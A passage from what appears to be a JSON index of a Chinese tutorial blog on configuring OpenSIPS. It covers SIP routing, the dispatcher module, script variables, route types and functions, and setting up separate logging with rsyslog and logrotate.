#2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.","title":"严格路由和松散路由"},{"content":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destinations, state。\ndestinations表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会向可用的目的地转发sip消息\nid setid destinations state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无可用转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","permalink":"https://wdd.js.org/opensips/ch6/dispatcher/","summary":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destinations, state。\ndestinations表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会向可用的目的地转发sip消息\nid setid destinations state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无可用转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, 
send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","title":"sip消息分发之dispatcher模块"},{"content":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示索引,有些变量类似于数组,可以使用索引来指定。索引可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # by type and name $hdr(Contact) # by type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住的变量用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP
address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.opensips.org/Documentation/Script-CoreVar-2-4\n键值对变量 键值对变量是按需创建的 键值对只能用于有状态的路由处理中 键值对会绑定到指定的消息或者事务上 键值对初始化时是空值 键值对可以在所有的路由中读写 在响应路由中使用键值对,需要加载tm模块,并且设置onreply_avp_mode参数 键值对可以读写,也可以删除 可以把键值对理解为key为hash, 值为堆栈的数据结构 $avp(my_name) = \u0026#34;wang\u0026#34; $avp(my_name) = \u0026#34;duan\u0026#34; xlog(\u0026#34;$avp(my_name)\u0026#34;) # duan xlog(\u0026#34;$avp(my_name)[0]\u0026#34;) # wang xlog(\u0026#34;$avp(my_name)[*]\u0026#34;) # wang duanduan 脚本变量 脚本变量只存在于当前主路由及其子路由中。路由结束,脚本变量将回收。 脚本变量需要指定初始化值,否则变量的值将不确定。 脚本变量只能有一个值 脚本变量读取要比键值对变量快,脚本变量直接引用内存的位置 如果需要变量,可以优先考虑使用脚本变量 $var(my_name) = \u0026#34;wangduanduan\u0026#34; $var(log_msg) = $var(my_name) + $ci + $fu xlog(\u0026#34;$var(log_msg)\u0026#34;) 脚本翻译 脚本翻译可以理解为一种工具函数,可以用来获取字符串长度,获取字符串的子字符等等操作。\n获取字符串长度 $(fu{s.len}) 字符串截取子串 $(var(x){s.substr,5,2}) 获取字符串的某部分 $(avp(my_uri){uri.user}) 将字符串值转为整数 $(var(x){s.int}) 翻译也可以链式调用 $(hdr(Test){s.escape.common}{s.len}) ","permalink":"https://wdd.js.org/opensips/ch5/var/","summary":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示索引,有些变量类似于数组,可以使用索引来指定。索引可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # by type and name $hdr(Contact) # by type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住的变量用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts
current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.","title":"变量的使用"},{"content":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 ","permalink":"https://wdd.js.org/opensips/ch5/triger-time/","summary":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 
","title":"路由的触发时机"},{"content":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦查兵可以看成是初始化请求,搬运并可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单的更具sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-ivite, notify has_totag()是true 1. 只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b76 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt;, \u0026lt;sip:ss2.biloxi.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=314159 Call-ID: 3848276298220188511@atlanta.example.com CSeq: 2 ACK Content-Length: 0 注意,一定要明确一个消息,到底是请求还是响应。我们说初始化请求和序列化请求,说的都是请求,而不是响应。\n有些响应效应,例如代理返回的407响应,也会带有to tag。\nSIP/2.0 407 Proxy Authorization Required Via: 
SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 ;received=192.0.2.101 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=3flal12sf Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Proxy-Authenticate: Digest realm=\u0026#34;atlanta.example.com\u0026#34;, qop=\u0026#34;auth\u0026#34;, nonce=\u0026#34;f84f1cec41e6cbe5aea9c8e88d359\u0026#34;, opaque=\u0026#34;\u0026#34;, stale=FALSE, algorithm=MD5 Content-Length: 0 下图初始化请求\n下图序列化请求\n路由脚本中,初始化请求都是需要下很多功夫去考虑如何处理的。而对于序列化请求的处理则要简单的多。\n","permalink":"https://wdd.js.org/opensips/ch5/init-seque/","summary":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦察兵可以看成是初始化请求,搬运兵可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单的根据sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-invite, notify has_totag()是true 1.
只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.","title":"【重点】初始化请求和序列化请求"},{"content":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg\n","permalink":"https://wdd.js.org/opensips/ch5/module/","summary":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg","title":"脚本路由模块化"},{"content":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 
如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","permalink":"https://wdd.js.org/opensips/ch5/xlog/","summary":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","title":"优雅的使用xlog输出日志行"},{"content":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 listen:ws:172.16.200.228:5062 ","permalink":"https://wdd.js.org/opensips/ch5/global-params/","summary":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 
listen:ws:172.16.200.228:5062 ","title":"全局参数配置"},{"content":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给route传递参数。\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","permalink":"https://wdd.js.org/opensips/ch5/function/","summary":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给route传递参数。\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","title":"函数特点"},{"content":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound
分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch fork 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。\n请求路由 请求路由因为收到从外部网络来的请求而触发。\n# 主路由 route { ...... if (is_method(\u0026#34;INVITE\u0026#34;)) { route(check_hdrs,1); # 调用子路由check_hdrs,1是传递给子路由的参数 if ($rc\u0026lt;0) # 使用$rc获取上个子路由的处理结果 exit; } } # sub-route route[check_hdrs] { if (!is_present_hf(\u0026#34;Content-Type\u0026#34;)) return(-1); if ( $param(1)==1 \u0026amp;\u0026amp; !has_body() ) # 子路由使用$param(1), 获取传递的第一个参数 return(-2); # 使用return() 返回子路由的处理结果 return(1); } $rc和$retcode都可以获取子路由的返回结果。\n请求路由是必须的一个路由,所有从网络过来的请求,都会经过请求路由。\n在请求路由中,可以做三个动作\n给出响应 向前传递 丢弃这个请求 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是丢弃这个请求 分支路由 注意事项:\n分支路由在sip请求被转发出去时触发 默认的动作是发出这个请求 t_on_branch并不是立即执行分支路由,而是注册分支路由的处理事件 注意所有**t_on_**开头的函数都是注册钩子,而不是立即执行。注册钩子可以理解为不是现在执行,而是未来某个时间会被触发执行。 分支路由只能用来触发一次,多次触发将会重写 你可以在这个路由中修改sip request url, 但是不能执行reply等信令方面的操作 route{ ... t_on_branch(\u0026#34;nat_filter\u0026#34;) ... } branch_route[nat_filter]{ } 失败路由 当收到大于等于300的响应时触发失败路由 route{ ... t_on_failure(\u0026#34;vm_redirect\u0026#34;) ...
} failure_route[vm_redirect]{ } 响应路由 当收到响应时触发,包括1xx-6xx的所有响应。\n响应路由分为两类\n全局响应路由,即不带名称的onreply_route{}, 自动触发,在带名响应路由前执行。 带名称的响应路由,即onreply_route[some_name]{},需要用t_on_reply()方法来设置触发。 route{ t_on_reply(\u0026#34;inspect_reply\u0026#34;); } onreply_route{ xlog(\u0026#34;$rm/$rs/$si/$ci: global onreply route\u0026#34;); } onreply_route[inspect_reply]{ if ( t_check_status(\u0026#34;1[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;provisional reply $T_reply_code received\\n\u0026#34;); } if ( t_check_status(\u0026#34;2[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;successful reply $T_reply_code received\\n\u0026#34;); remove_hf(\u0026#34;User-Agent\u0026#34;); } else { xlog(\u0026#34;non-2xx reply $T_reply_code received\\n\u0026#34;); } } 本地路由 有些请求是opensips自己发的,这时候触发本地路由。使用场景:在多人会议时,opensips可以给多人发送bye消息。\nlocal_route { } 启动路由 可以让你在opensips启动时做些初始化操作\n注意启动路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\nstartup_route { } 计时器路由 在指定的周期,触发路由。可以用来更新本地缓存。\n注意计时器路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\n如:每隔120秒,做个事情\ntimer_route[gw_update, 120] { # update the local cache if signalized if ($shv(reload) == 1 ) { avp_db_query(\u0026#34;select gwlist from routing where id=10\u0026#34;, \u0026#34;$avp(list)\u0026#34;); cache_store(\u0026#34;local\u0026#34;,\u0026#34;gwlist10\u0026#34;,\u0026#34; $avp(list)\u0026#34;); } } 事件路由 当收到某些事件时触发,例如日志,数据库操作,数据更新等。\n在事件路由的内部,可以使用$param(key)的方式获取事件的某些属性。\nxlog(\u0026#34;first parameters is $param(1)\\n\u0026#34;); # 根据序号 xlog(\u0026#34;Pike Blocking IP is $param(ip)\\n\u0026#34;); # 根据key event_route[E_DISPATCHER_STATUS] { } event_route[E_PIKE_BLOCKED] { xlog(\u0026#34;IP $param(ip) has been blocked\\n\u0026#34;); } 更多可以参考: https://opensips.org/html/docs/modules/devel/event_route.html\n错误路由 用来捕获运行时错误,例如解析sip消息出错。\nerror_route { xlog(\u0026#34;$rm from $si:$sp - error level=$(err.level), info=$(err.info)\\n\u0026#34;); sl_send_reply(\u0026#34;$err.rcode\u0026#34;, \u0026#34;$err.rreason\u0026#34;);
exit; } ","permalink":"https://wdd.js.org/opensips/ch5/routing-type/","summary":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。","title":"路由分类"},{"content":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务\n*/10 * * * * /usr/sbin/logrotate /etc/logrotate.d/opensips ","permalink":"https://wdd.js.org/opensips/ch3/log/","summary":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 
